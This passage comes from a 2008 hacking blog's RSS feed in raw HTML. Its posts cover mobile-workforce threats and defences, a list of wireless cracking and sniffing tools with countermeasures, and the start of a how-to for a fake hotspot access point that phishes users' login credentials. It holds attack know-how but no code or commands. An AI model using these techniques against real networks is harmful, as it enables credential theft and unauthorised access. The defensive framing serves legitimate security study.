style="font-weight: bold;"&gt;Related Articles:&lt;/span&gt;&lt;br /&gt;&lt;a href="http://freedownloaz.blogspot.com/2008/02/kismet-wireless-network-sniffer.html"&gt;Wireless Network Sniffer&lt;/a&gt;&lt;span style="font-weight: bold;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;a href="http://freedownloaz.blogspot.com/2008/02/essential-wireless-hacking-tools.html"&gt;Wireless Hacking Tools&lt;br /&gt;&lt;/a&gt;&lt;a href="http://freedownloaz.blogspot.com/2008/02/wireless-hacking_19.html"&gt;Wirelss Hacking&lt;/a&gt;&lt;br /&gt;&lt;/p&gt;&lt;div style="text-align: justify;"&gt;&lt;img src="http://img179.imageshack.us/img179/4504/nsaiengu8.png" border="0" /&gt;&lt;/div&gt;&lt;span class="article_seperator"&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="article_seperator"&gt;&lt;/span&gt;&lt;/div&gt;</description><link>http://freedownloaz.blogspot.com/2008/02/hacking-online-banking-and-credit-card.html</link><author>noreply@blogger.com (saien)</author><thr:total>10</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3865216611793770662.post-4586191967823655321</guid><pubDate>Wed, 20 Feb 2008 16:15:00 +0000</pubDate><atom:updated>2008-02-20T08:26:30.731-08:00</atom:updated><title>Step-By-Step Hacking Video</title><description>&lt;div style="text-align: justify;"&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-weight: bold;"&gt;Hacking:&lt;/span&gt;Everyone talks about the ability to hack computers via wireless technology, &lt;em&gt;but have you ever actually &lt;strong&gt;SEEN&lt;/strong&gt; someone do it&lt;/em&gt;? Well you're about to. The &lt;a target="_blank" href="http://www.demosondemand.com/clients/fiberlink/002/page/index_new.asp#" class="undefined"&gt;Step-By-Step Hacking Video&lt;/a&gt; will show exactly how a laptop without the proper security protection can be attacked and exploited. In a manner of mere minutes, we can &lt;strong&gt;&lt;em&gt;own&lt;/em&gt;&lt;/strong&gt; an unprotected or out-of-date system. The video actually shows the exact procedures that a hacker could utilize to gain access to a mobile system and eventually a corporate network. Steps and technologies to prevent such an attack are presented throughout the video and are the focus of this article. &lt;strong&gt;NOTE: While it may seem that the first few minutes of the video are unexciting – just wait – you are being setup!&lt;/strong&gt;&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;p style="text-align: justify;"&gt; This article is broken up into two sections. The first section quantifies the different threats to which mobile computer systems are susceptible. The second portion defines the fundamental methodological steps that hackers take in trying to exploit computer systems directly and details how each step could be thwarted. These fundamental steps are also used in the video. &lt;/p&gt;&lt;div style="text-align: justify;"&gt; &lt;/div&gt;&lt;p style="text-align: justify;"&gt; Today’s mobile workforce poses significant security challenges to corporations. With workers accessing corporate resources from public wi-fi hotspots, hotels, home wi-fi and broadband networks, etc., the need for a comprehensive mobile workforce security solution is becoming a necessity. This is an extraordinary challenge considering the additional complexity of the mobile workforce being a moving target and with security budgets and personnel constantly being downsized. &lt;/p&gt;&lt;div style="text-align: justify;"&gt; &lt;/div&gt;&lt;p style="text-align: justify;"&gt; To implement an ideal mobile workforce solution, it is important to understand the actual threats. These threats fall into three main categories: &lt;/p&gt;&lt;div style="text-align: justify;"&gt; &lt;/div&gt;&lt;h3 style="text-align: justify;"&gt;Malware&lt;/h3&gt;&lt;div style="text-align: justify;"&gt; &lt;/div&gt;&lt;p style="text-align: justify;"&gt; Most consumers think of viruses when it comes to malware and believe that an antivirus software solution will address all malware threats. Those of us in the industry realize that it is much more complex. For antivirus solutions to be effective, they need to be running and the virus definitions need to be up-to-date. This can be a significant challenge with a mobile workforce that is not always online when automatic updates are performed. To protect yourself from malware, please consider the following: &lt;/p&gt;&lt;div style="text-align: justify;"&gt; &lt;/div&gt;&lt;ul style="text-align: justify;"&gt;&lt;li&gt;  &lt;p&gt; In addition to antivirus software, antispyware applications are necessary to address the malware threat. Keeping these applications running and up-to-date poses the same difficulty as antivirus updates. &lt;/p&gt;  &lt;/li&gt;&lt;/ul&gt;&lt;div style="text-align: justify;"&gt; &lt;/div&gt;&lt;ul style="text-align: justify;"&gt;&lt;li&gt;  &lt;p&gt; Another important tool to combat malware is an enterprise-grade personal firewall with IDS/IPS capability. This is important because antivirus and antispyware applications are reactive and based upon recent definition files. Conversely, an enterprise-grade personal firewall with IDS/IPS capability has the ability of performing zero day protection, where malicious behavior can be intelligently identified and stopped as it occurs. &lt;/p&gt;  &lt;/li&gt;&lt;li&gt;  &lt;p&gt; An often-overlooked means to prevent the risk from malware is ensuring that the remote endpoints have the latest operating system and application security patches and that the remote system is properly configured from a security perspective. This is important because malware will often take advantage of system and application vulnerabilities that would not be present if the system were up-to-date with patches and properly configured. &lt;/p&gt;  &lt;/li&gt;&lt;li&gt;  &lt;p&gt;  It is also important to note that there is a significant risk that &lt;strong&gt;&lt;em&gt;anti-antivirus&lt;/em&gt;&lt;/strong&gt; and &lt;strong&gt;&lt;em&gt;anti-personal firewall malware&lt;/em&gt;&lt;/strong&gt; will disable the security applications that corporations put into place. Consequently, it is important to have a check take place to ensure that these applications are running and up-to-date and if they are not, access to the Internet, corporate network, etc. should be denied and the deficiency remediated. The logic for such checking and remediation should reside on the remote endpoint, as today’s systems need to be in compliance with security policies at all times. In the past, corporations have relied upon VPN Concentrators or Cisco NAC-type functionality to check the security posture of the remote endpoint as it is gaining access to the corporate network. With today’s mobile workers spending 80% of their time not VPN’d into a corporate network, this way of checking the state of the system’s security posture is inadequate. &lt;/p&gt;  &lt;/li&gt;&lt;/ul&gt;&lt;div style="text-align: justify;"&gt; &lt;/div&gt;&lt;h3 style="text-align: justify;"&gt;Sniffing&lt;/h3&gt;&lt;div style="text-align: justify;"&gt; &lt;/div&gt;&lt;p style="text-align: justify;"&gt; A mobile worker constantly has the threat of their data being sniffed. Sniffing can fall into two fundamental categories:  &lt;/p&gt;&lt;div style="text-align: justify;"&gt; &lt;/div&gt;&lt;ul style="text-align: justify;"&gt;&lt;li&gt;  &lt;p&gt; Sniffing of Credentials – Corporations are moving to a model where a single application is being used to provide dial-in, wi-fi, broadband, mobile data (CDMA, EVDO,), etc. access. In doing so, there is an advantage to having authentication for all of these different transports proxied back to a central location, commonly the corporation's network. Often, these authentication credentials are the remote user’s network credentials, or some other credentials that have significant value to the end-user and corporation. Consequently, it is very important to ensure that these credentials are protected during the proxy process. With standard RFC Compliant RADIUS Proxy (A commonly used authentication protocol), the username is always sent in the clear and the password is hashed with MD5, then un-hashed and re-hashed on each RADIUS server through which the credentials pass. &lt;/p&gt;  &lt;/li&gt;&lt;/ul&gt;&lt;div style="text-align: justify;"&gt; &lt;/div&gt;&lt;ul style="text-align: justify;"&gt;&lt;li&gt;  &lt;p&gt; Sniffing of Data – With workers using public and private wi-fi and hotel broadband Internet access, the threat of an unwanted party sniffing application traffic is a very real concern. In virtually all cases, public wi-fi locations and hotel broadband locations do not offer any forms of inherent encryption for data leaving a system on these networks, while at the same time making these networks readily available to a number of simultaneous users. The best way to protect against the sniffing of data is to ensure that a VPN tunnel is active throughout the life of the public wi-fi and hotel broadband network connection. Doing this and disabling split-tunneling will ensure that all data leaving the remote system will be encrypted via the VPN client, which commonly would use DES, 3DES or AES encryption. &lt;/p&gt;  &lt;/li&gt;&lt;/ul&gt;&lt;div style="text-align: justify;"&gt; &lt;/div&gt;&lt;h3 style="text-align: justify;"&gt;Direct Attack&lt;/h3&gt;&lt;div style="text-align: justify;"&gt; &lt;/div&gt;&lt;p style="text-align: justify;"&gt; The most dangerous form of attack is a direct attack. This is because a hacker can use their cognitive skills to exploit a remote system and to leave the remote system vulnerable in the future. They can also consciously dissect and analyze data on the remote system. There are a number of key security steps to implement to protect against a direct attack: &lt;/p&gt;&lt;div style="text-align: justify;"&gt; &lt;/div&gt;&lt;ul style="text-align: justify;"&gt;&lt;li&gt;  &lt;p&gt; Remote systems need to be up-to-date with security patches and properly configured. Hackers gain direct access to remote endpoints by running exploits that take advantage of vulnerabilities on the remote system that would not be present if the system were properly patched and properly configured. Ensuring a mobile workforce has the latest patches and is properly configured is one of the biggest security challenges to organizations. Virtually all of the patching systems in place today do not provide a means to remediate the remote system by actually pushing the necessary patch or configuration to the system when the endpoint is not connected directly to or VPN’d into the corporate network. With end-users spending 80% of their online time not VPN’d into the corporate network, that leaves a significant gap. &lt;/p&gt;  &lt;/li&gt;&lt;li&gt;  &lt;p&gt; Ensuring the remote endpoint has an enterprise-grade personal firewall that is running, properly configured and up-to-date. This firewall would not only prohibit a hacker from accessing the remote systems, it would also provide stealth capabilities to help make the endpoint invisible to scans. &lt;/p&gt;  &lt;/li&gt;&lt;li&gt;  &lt;p&gt; Being purposely redundant, antivirus and antispyware applications need to be running and up-to-date. An outdated security application will not provide protection against newly developed malware. Commonly, a hacker will place malware on a victim’s machine to either further exploit it, or to provide a means to exploit it in the future. An endpoint that is constantly scanning for the existence of such malware will be able to detect when this takes place and perform the necessary actions to address the threat. &lt;/p&gt;  &lt;/li&gt;&lt;/ul&gt;&lt;div style="text-align: justify;"&gt; &lt;/div&gt;&lt;h3 style="text-align: justify;"&gt;Step-by-Step Guide to the Fundamental Steps Performed in the Video and How to Combat Them&lt;/h3&gt;&lt;div style="text-align: justify;"&gt; &lt;/div&gt;&lt;h4 style="text-align: justify;"&gt;Footprinting and Scanning&lt;/h4&gt;&lt;div style="text-align: justify;"&gt; &lt;/div&gt;&lt;p style="text-align: justify;"&gt; The first step is finding a live system. There are many tools available on the Internet to search for live targets. To protect against footprinting and scanning, use an enterprise-grade, properly configured and running personal firewall. This is the best means to protect your mobile systems from even being seen during a scan. &lt;/p&gt;&lt;div style="text-align: justify;"&gt; &lt;/div&gt;&lt;h4 style="text-align: justify;"&gt;Enumeration&lt;/h4&gt;&lt;div style="text-align: justify;"&gt; &lt;/div&gt;&lt;p style="text-align: justify;"&gt; Once a target is found, more information needs to be gathered to determine the best approach for exploiting it. Just as there are many scanning tools available free on the Internet, there are many enumeration tools available. There are two main steps that should be implemented to prevent enumeration from taking place: &lt;/p&gt;&lt;div style="text-align: justify;"&gt; &lt;/div&gt;&lt;ul style="text-align: justify;"&gt;&lt;li&gt;  &lt;p&gt;  Ensuring that a properly configured enterprise-grade firewall is present and operational.   &lt;/p&gt;  &lt;/li&gt;&lt;li&gt;  &lt;p&gt;  Ensuring that the remote operating system is properly configured, so that it does not disclose this type of information.   &lt;/p&gt;  &lt;/li&gt;&lt;/ul&gt;&lt;div style="text-align: justify;"&gt; &lt;/div&gt;&lt;h4 style="text-align: justify;"&gt;Launching an Attack&lt;/h4&gt;&lt;div style="text-align: justify;"&gt; &lt;/div&gt;&lt;p style="text-align: justify;"&gt; Once a live system is found and information is gathered about it, a direct attack can be launched against the system. There are a number of steps that can be taken to prevent a direct attack: &lt;/p&gt;&lt;div style="text-align: justify;"&gt; &lt;/div&gt;&lt;ul style="text-align: justify;"&gt;&lt;li&gt;  &lt;p&gt; Ensuring your remote systems have the latest operating system and application security patches. When hackers launch an attack against a system they do so using exploits that take advantage of vulnerabilities on the remote system that commonly would not be present if the remote systems was up-to-date with security patches. &lt;/p&gt;  &lt;/li&gt;&lt;li&gt;  &lt;p&gt;  Ensuring that a properly configured enterprise-grade firewall is present and operational.   &lt;/p&gt;  &lt;/li&gt;&lt;li&gt;  &lt;p&gt; Ensuring that antivirus and antiSpyware are running, utilizing real-time scanning and are up-to-date on your remote systems. It is a common tactic for hackers to place trojans and other malware on hacked systems and having these programs actively scanning would help catch situations where this malware is being transferred to the hacked machine. &lt;/p&gt;  &lt;/li&gt;&lt;/ul&gt;&lt;div style="text-align: justify;"&gt; &lt;/div&gt;&lt;h4 style="text-align: justify;"&gt;Leaving the Remote System Vulnerable to an Attack&lt;/h4&gt;&lt;div style="text-align: justify;"&gt; &lt;/div&gt;&lt;p style="text-align: justify;"&gt; Once a hacker has exploited the system, they will commonly take steps to leave it vulnerable to future attacks. This can be done by installing a trojan or remote control software, installing a key logger that routinely sends all keystrokes from the system, etc. To protect against this step: &lt;/p&gt;&lt;div style="text-align: justify;"&gt; &lt;/div&gt;&lt;ul style="text-align: justify;"&gt;&lt;li&gt;  &lt;p&gt; Ensuring an enterprise-grade personal firewall is running, properly configured and up-to-date. This can stop a remote connection from taking place and sense when malicious activities are taking place. &lt;/p&gt;  &lt;/li&gt;&lt;li&gt;  &lt;p&gt; Ensuring that antiSpyware and antivirus applications are running, and up-to-date. In doing so, these security applications would be able to find address and malware left behind to further exploit the system. &lt;/p&gt;  &lt;/li&gt;&lt;/ul&gt;&lt;div style="text-align: justify;"&gt; &lt;/div&gt;&lt;p style="text-align: justify;"&gt; I hope this helps shed light on the hacking process and has given you ample information to help you protect your own corporate networks including those ever slippery mobile workforce machines.&lt;/p&gt;&lt;p style="text-align: justify;"&gt;The credit goes to the Ethical Hackers.&lt;/p&gt;&lt;div style="text-align: justify;"&gt;&lt;img src="http://img179.imageshack.us/img179/4504/nsaiengu8.png" border="0" /&gt;&lt;/div&gt;&lt;p style="text-align: justify;"&gt; &lt;/p&gt;</description><link>http://freedownloaz.blogspot.com/2008/02/step-by-step-hacking-video.html</link><author>noreply@blogger.com (saien)</author><thr:total>2</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3865216611793770662.post-2655849270819701566</guid><pubDate>Wed, 20 Feb 2008 15:54:00 +0000</pubDate><atom:updated>2008-02-21T22:00:40.920-08:00</atom:updated><title>Essential Wireless Hacking Tools</title><description>&lt;p style="text-align: justify; font-weight: bold;"&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-weight: normal;"&gt;E&lt;/span&gt;&lt;span style="font-weight: normal;font-size:100%;" &gt;ssential Wireless Hacking Tools,&amp;amp; the most important wireless hacing tools ,here are the most essential tools for wireless hacking ,guys interested in gaining a deeper knowledge of wireless security and exploiting vulnerabilities will need a good set of base tools with which to work. Fortunately, there are an abundance of free tools available on the Internet. This list is not meant to be comprehensive in nature but rather to provide some general guidance on recommended tools to build your toolkit.&lt;/span&gt;&lt;span style="font-weight: bold;font-size:100%;" &gt; &lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;div style="text-align: justify; font-weight: bold;"&gt;   &lt;script type="text/javascript" src="http://www.spotplex.com/send/743704/no-image.js"&gt; &lt;/script&gt;&lt;span style="font-weight: normal;font-size:100%;" &gt;Finding Wireless Networks:&lt;br /&gt;Locating a wireless network is the first step in trying to exploit it. There are two tools that are commonly used in this regard:&lt;br /&gt;&lt;a target="_blank" href="http://www.netstumbler.com/downloads/" class="undefined"&gt;Network Stumbler a.k.a NetStumbler&lt;/a&gt; – This Windows based tool easily finds wireless signals being broadcast within range – A must have. It also has ability to determine Signal/Noise info that can be used for site surveys. I actually know of one highly known public wireless hotspot provider that uses this utility for their site surveys&lt;/span&gt;&lt;span style="font-weight: normal;font-size:100%;" &gt;. &lt;/span&gt;&lt;span style="font-weight: bold;font-size:100%;" &gt; &lt;p align="center"&gt; &lt;img src="http://www.ethicalhacker.net/images/stories/columns/hoffman/nov05/netstumbler.jpg" border="0" height="199" width="500" /&gt;&lt;/p&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-weight: bold;font-size:100%;" &gt;&lt;p align="center"&gt;(NetStumbler Screenshot)  &lt;/p&gt; &lt;p&gt; &lt;a target="_blank" href="http://www.kismetwireless.net/" class="undefined"&gt;Kismet&lt;/a&gt; – &lt;span style="font-weight: normal;font-size:100%;" &gt;One of the key functional elements missing from NetStumbler is the ability to display Wireless Networks that are not broadcasting their SSID. As a potential wireless security expert, you should realize that Access Points are routinely broadcasting this info; it just isn’t being read/deciphered. Kismet will detect and display SSIDs that are not being broadcast which is very critical in finding wireless networks.&lt;/span&gt; &lt;/p&gt;&lt;/span&gt;&lt;span style="font-weight: bold;font-size:100%;" &gt; &lt;p align="center"&gt; &lt;img src="http://www.ethicalhacker.net/images/stories/columns/hoffman/nov05/kismet.jpg" border="0" height="295" width="491" /&gt;&lt;/p&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-weight: bold;font-size:100%;" &gt;&lt;p align="center"&gt;(Kismet Screenshot)  &lt;/p&gt;  &lt;h3 style="font-weight: bold;"&gt;&lt;span style="font-size:85%;"&gt;Attaching to the Found Wireless Network:&lt;/span&gt;&lt;span style="font-weight: normal;font-size:85%;" &gt;Once you’ve found a wireless network, the next step is to try to connect to it. If the network isn’t using any type of authentication or encryption security, you can simply connect to the SSID. If the SSID isn’t being broadcast, you can create a profile with the name of the SSID that is not being broadcast. Of course you found the non-broadcast SSID with Kismet, right? If the wireless network is using authentication and/or encryption, you may need one of the following tools.&lt;/span&gt; &lt;/h3&gt;  &lt;p style="font-weight: bold;"&gt; &lt;span style="font-size:85%;"&gt;&lt;a target="_blank" href="http://airsnort.shmoo.com/" class="undefined"&gt;Airsnort&lt;/a&gt; – &lt;span style="font-weight: normal;font-size:100%;" &gt;This is a very easy to use tool that can be used to sniff and crack WEP keys.  While many people bash the use of WEP, it is certainly better than using nothing at all.  Something you’ll find in using this tool is that it takes a lot of sniffed packets to crack the WEP key. There are additional tools and strategies that can be used to force the generation of traffic on the wireless network to shorten the amount of time needed to crack the key, but this feature is not included in Airsnort.&lt;/span&gt;&lt;/span&gt; &lt;/p&gt;&lt;/span&gt;&lt;span style="font-weight: bold;font-size:100%;" &gt; &lt;p align="center"&gt; &lt;img src="http://www.ethicalhacker.net/images/stories/columns/hoffman/nov05/airsnort.jpg" border="0" height="174" width="539" /&gt;&lt;/p&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-weight: bold;font-size:100%;" &gt;&lt;p align="center"&gt;(Screenshot of Airsnort in Action)  &lt;/p&gt; &lt;p&gt; &lt;a target="_blank" href="http://sourceforge.net/projects/cowpatty" class="undefined"&gt;CowPatty&lt;/a&gt; – &lt;span style="font-weight: normal;font-size:100%;" &gt;This tool is used as a brute force tool for cracking WPA-PSK, considered the “New WEP” for home Wireless Security. This program simply tries a bunch of different options from a dictionary file to see if one ends up matching what is defined as the Pre-Shared Key.&lt;/span&gt; &lt;/p&gt;&lt;/span&gt;&lt;span style="font-weight: bold;font-size:100%;" &gt; &lt;p align="center"&gt; &lt;img src="http://www.ethicalhacker.net/images/stories/columns/hoffman/nov05/cowpatty.jpg" border="0" height="283" width="455" /&gt;&lt;/p&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-weight: bold;font-size:100%;" &gt;&lt;p align="center"&gt;(Cowpatty Options Screenshot)  &lt;/p&gt; &lt;p&gt; &lt;a target="_blank" href="http://asleap.sourceforge.net/" class="undefined"&gt;ASLeap&lt;/a&gt; – &lt;span style="font-weight: normal;font-size:100%;" &gt;If a network is using LEAP, this tool can be used to gather the authentication data that is being passed across the network, and these sniffed credentials can be cracked.  LEAP doesn’t protect the authentication like other “real” EAP types, which is the main reason why LEAP can be broken.&lt;/span&gt; &lt;/p&gt;&lt;/span&gt;&lt;span style="font-weight: bold;font-size:100%;" &gt; &lt;p align="center"&gt; &lt;img src="http://www.ethicalhacker.net/images/stories/columns/hoffman/nov05/asleap.jpg" border="0" height="306" width="491" /&gt;&lt;/p&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-weight: bold;font-size:100%;" &gt;&lt;p align="center"&gt;(Asleap Options  Screenshot)  &lt;/p&gt;  &lt;h3&gt;Sniffing Wireless Data:&lt;/h3&gt; &lt;p style="font-weight: normal;"&gt; Whether you are directly connected to a wireless network or not, if there is wireless network in range, there is data flying through the air at any given moment. You will need a tool to be able to see this data. &lt;/p&gt; &lt;p&gt; &lt;a style="font-weight: normal;" target="_blank" href="http://www.wireshark.org/"&gt;Wireshark&lt;/a&gt; &lt;span style="font-weight: normal;font-size:100%;" &gt;(formerly Ethereal) – While there has been much debate on the proper way to pronounce this utility, there is no question that it is an extremely valuable tool. Ethereal can scan wireless and Ethernet data and comes with some robust filtering capabilities. It can also be used to sniff-out 802.11 management beacons and probes and subsequently could be used as a tool to sniff-out non-broadcast SSIDs.&lt;/span&gt; &lt;/p&gt;&lt;/span&gt;&lt;span style="font-weight: bold;font-size:100%;" &gt; &lt;p align="center"&gt; &lt;img src="http://www.ethicalhacker.net/images/stories/columns/hoffman/nov05/ethereal.jpg" border="0" height="436" width="575" /&gt;&lt;/p&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-weight: bold;font-size:100%;" &gt;&lt;p align="center"&gt;(Screenshot of Ethereal in Action)  &lt;/p&gt; &lt;p align="center"&gt; &lt;img src="http://www.ethicalhacker.net/images/stories/columns/hoffman/nov05/yahooim.jpg" border="0" height="105" width="576" /&gt;&lt;/p&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-size:100%;"&gt;&lt;p style="font-weight: normal;" align="center"&gt;&lt;span style="font-size:85%;"&gt;(Yahoo IM Session being sniffed in Ethereal)  &lt;/span&gt;&lt;/p&gt; &lt;p style="font-weight: normal;"&gt;&lt;span style="font-size:85%;"&gt;&lt;span style="font-size:100%;"&gt; The aforementioned utilities, or similar ones, will be necessities in your own wireless security toolkit. The easiest way to become familiar with these tools is to simply use them in a controlled lab environment. And cost is no excuse as all of these tools are available freely on the Internet.&lt;/span&gt; &lt;/span&gt;&lt;/p&gt;  &lt;h3 style="font-weight: bold;"&gt;&lt;span style="font-size:85%;"&gt;Protecting Against These Tools:&lt;/span&gt;&lt;/h3&gt; &lt;p style="font-weight: normal;"&gt;&lt;span style="font-size:85%;"&gt;&lt;span style="font-size:100%;"&gt; Just as it’s important to know how to utilize the aforementioned tools, it is important to know best practices on how to secure your Wireless Network Against these tools.&lt;/span&gt; &lt;/span&gt;&lt;/p&gt; &lt;p style="font-weight: normal;"&gt; &lt;span style="font-size:85%;"&gt;&lt;strong&gt;NetStumbler&lt;/strong&gt; – &lt;span style="font-size:100%;"&gt;Do not broadcast your SSID.  Ensure your WLAN is protected by using advanced Authentication and Encryption.  &lt;/span&gt;&lt;/span&gt;&lt;/p&gt; &lt;p style="font-weight: normal;"&gt; &lt;span style="font-size:85%;"&gt;&lt;strong&gt;Kismet&lt;/strong&gt; – &lt;span style="font-size:100%;"&gt;There’s really nothing you can do to stop Kismet from finding your WLAN, so ensure your WLAN is protected by using advanced Authentication and Encryption&lt;/span&gt; &lt;/span&gt;&lt;/p&gt; &lt;p style="font-weight: normal;"&gt; &lt;span style="font-size:85%;"&gt;&lt;strong&gt;Airsnort&lt;/strong&gt; – &lt;span style="font-size:100%;"&gt;Use a 128-bit, not a 40-bit WEP encryption key.  This would take longer to crack.  If your equipment supports it, use WPA or WPA2 instead of WEP (may require firmware or software update).&lt;/span&gt; &lt;/span&gt;&lt;/p&gt; &lt;p style="font-weight: normal;"&gt; &lt;span style="font-size:85%;"&gt;&lt;strong&gt;Cowpatt&lt;span style="font-size:100%;"&gt;y&lt;/span&gt;&lt;/strong&gt;&lt;span style="font-size:100%;"&gt; – Use a long and complex WPA Pre-Shared Key.  This type of key would have less of a chance of residing in a dictionary file that would be used to try and guess your key and/or would take longer.  If in a corporate scenario, don’t use WPA with Pre-Shared Key, use a good EAP type to protect the authentication and limit the amount of incorrect guesses that would take place before the account is locked-out.  If using certificate-like functionality, it could also validate the remote system trying to gain access to the WLAN and not allow a rogue system access.&lt;/span&gt; &lt;/span&gt;&lt;/p&gt; &lt;p style="font-weight: normal;"&gt; &lt;span style="font-size:85%;"&gt;&lt;strong&gt;ASLeap&lt;/strong&gt; – &lt;span style="font-size:100%;"&gt;Use long and complex credentials, or better yet, switch to EAP-FAST or a different EAP type&lt;/span&gt;.&lt;/span&gt;  &lt;/p&gt; &lt;p style="font-weight: normal;"&gt; &lt;strong&gt;Ethereal&lt;/strong&gt; – Use encryption, so that anything sniffed would be difficult or nearly impossible to break.  WPA2, which uses AES, is essentially unrealistic to break by a normal hacker.  Even WEP will encrypt the data.  When in a Public Wireless Hotspot (which generally do not offer encryption), use application layer encryption, like Simplite to encrypt your IM sessions, or use SSL.  For corporate users, use IPSec VPN with split-tunneling disabled.  This will force all traffic leaving the machine through an encrypted tunnel that would be encrypted with DES, 3DES or AES.&lt;/p&gt;&lt;/span&gt;&lt;/div&gt;&lt;p style="text-align: justify; font-weight: bold;"&gt;&lt;span style="font-size:100%;"&gt;The credit goes to the Ethical Hackers.&lt;/span&gt;&lt;/p&gt;&lt;p style="text-align: justify; font-weight: bold;"&gt;&lt;span style="font-size:100%;"&gt;Related Articles:&lt;br /&gt;&lt;a style="font-weight: normal;" href="http://freedownloaz.blogspot.com/2008/02/hacking-online-banking-and-credit-card.html"&gt;Hacking online banking &amp;amp; credit cards&lt;/a&gt;&lt;br /&gt;&lt;a style="font-weight: normal;" href="http://freedownloaz.blogspot.com/2008/02/kismet-wireless-network-sniffer.html"&gt;Wireless Network Sniffer&lt;/a&gt;&lt;/span&gt;&lt;span style="font-size:100%;"&gt;&lt;br /&gt;&lt;a style="font-weight: normal;" href="http://freedownloaz.blogspot.com/2008/02/wireless-hacking_19.html"&gt;&lt;span style="text-decoration: underline;"&gt;Wireless Hacking&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-size:100%;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p style="text-align: justify; font-weight: bold;"&gt;&lt;span style="font-size:100%;"&gt;&lt;img src="http://img179.imageshack.us/img179/4504/nsaiengu8.png" border="0" /&gt;&lt;/span&gt;&lt;/p&gt;&lt;div style="text-align: justify; font-weight: bold;"&gt;&lt;span style="font-size:100%;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-size:100%;"&gt;&lt;p&gt; &lt;/p&gt;&lt;/span&gt;&lt;/div&gt;</description><link>http://freedownloaz.blogspot.com/2008/02/essential-wireless-hacking-tools.html</link><author>noreply@blogger.com (saien)</author><thr:total>1</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3865216611793770662.post-7691586606021901339</guid><pubDate>Wed, 20 Feb 2008 09:18:00 +0000</pubDate><atom:updated>2008-02-21T21:38:11.730-08:00</atom:updated><title>Wireless -Hotspot Hacks</title><description>&lt;div style="text-align: justify;"&gt;&lt;span style="font-weight: bold;"&gt;Wireless Hoptspot Hacks, " Wireless Hacks" tell abt  how 2 perform hotspot hacks?&lt;/span&gt;&lt;span style="font-weight: bold;"&gt; hacks/cracks/techniques dat u ll hopefully find 2 be "cool".&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Hack:&lt;/span&gt;&lt;br /&gt;U might seen wilreless hotspots as they can seen anywhere, with T-Mobile,Concourse,Wayport &amp;amp; so on...As we know mobile user are quickly connected in public places.Some  Hotspots are available for free or some require free subscription.IN public places these WI-Fi hotspot are the greater security risks which we find.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Stealing Wi-Fi Hotspot credentials:&lt;/span&gt;&lt;br /&gt;Once in Russia a hacker used to hack username &amp;amp; passwords of dial accounts &amp;amp; used to sell them in black market &amp;amp; the owner of stolen credentials had to pay high charges.With the adding of public WI-Fi locations, hte threat of stealing credentials have been increased &amp;amp; also stealing wireless subscription credentials.&lt;br /&gt;The easiest way to steal wireless subscription credentials is done by AP Phishing. Today's  real &amp;amp; applicable method is that end-user determines dat a wireless access point is valid by recognizing the SSID and ascertaining if the site has the look and feel of the real public Wi-Fi hotspot login page.For the end-user both of these can be spoofed(u cannot create normal network connections) &amp;amp; u need not to carry wireless access point around for doing this.  &lt;/div&gt;&lt;p style="text-align: justify;"&gt;&lt;span style="font-weight: bold;"&gt;Steps to perform this technique:&lt;/span&gt;  &lt;/p&gt;&lt;div style="text-align: justify;"&gt;  &lt;/div&gt;&lt;ul style="text-align: justify;"&gt;&lt;li&gt;First of all u have to setup ur computer to look alike an actual acsess point broadcasting da appropriate SSID(T-Mobile, Wayport, etc.)&lt;/li&gt;&lt;/ul&gt;&lt;div style="text-align: justify;"&gt;  &lt;/div&gt;&lt;ul style="text-align: justify;"&gt;&lt;li&gt;Now u have login page &amp;amp; ur PC ll display look alike original login page of provider whose signals u r broadcasting.&lt;/li&gt;&lt;/ul&gt;&lt;p style="text-align: justify;"&gt;  It is easy to make ur pc broadcast the SSID of ur Choice, so dat the user can connect to u instead of valid WI-Fi Hotspot SSID.The problem with dis method is sees dat dis is an Ad-Hoc network &amp;amp; they do not connect to it.Now we use Airsnarf by &lt;a target="_blank" href="http://airsnarf.shmoo.com/"&gt;Schmoo Group&lt;/a&gt;  to make da signal as it is coming from an access point, we turn our pc into access point.&lt;br /&gt;&lt;/p&gt;&lt;div style="text-align: justify;"&gt;Difficult part in using Airsnarf &amp;amp; other HostAp programs is to find a card which supports HostAP drivers.Generally we use Senao NL-2511CD PLUS EXT2 200mw PCMCIA Wi-Fi with a Rover Portable Laptop Mount 2.4GHz 5.5dBi Antenna, we can purchase them from &lt;a target="_blank" href="http://www.wlanparts.com/"&gt;http://www.wlanparts.com/&lt;/a&gt;. &lt;/div&gt;&lt;p style="text-align: justify;"&gt; Airsnarf consists of a number of configurable files that control how it operates.  &lt;/p&gt;&lt;div style="text-align: justify;"&gt; &lt;/div&gt;&lt;p style="text-align: justify;"&gt;  &lt;img src="http://www.ethicalhacker.net/images/stories/columns/hoffman/july06/1.jpg" alt="Active Image" height="94" width="273" /&gt;  &lt;/p&gt;&lt;div style="text-align: justify;"&gt; &lt;/div&gt;&lt;p style="text-align: justify;"&gt; &lt;strong&gt;airsnarf.cfg file used to configure basic Airsnarf functionality&lt;/strong&gt;  &lt;/p&gt;&lt;div style="text-align: justify;"&gt; &lt;/div&gt;&lt;p style="text-align: justify;"&gt; &lt;img src="http://www.ethicalhacker.net/images/stories/columns/hoffman/july06/2.jpg" alt="Active Image" height="414" width="412" /&gt;  &lt;/p&gt;&lt;div style="text-align: justify;"&gt; 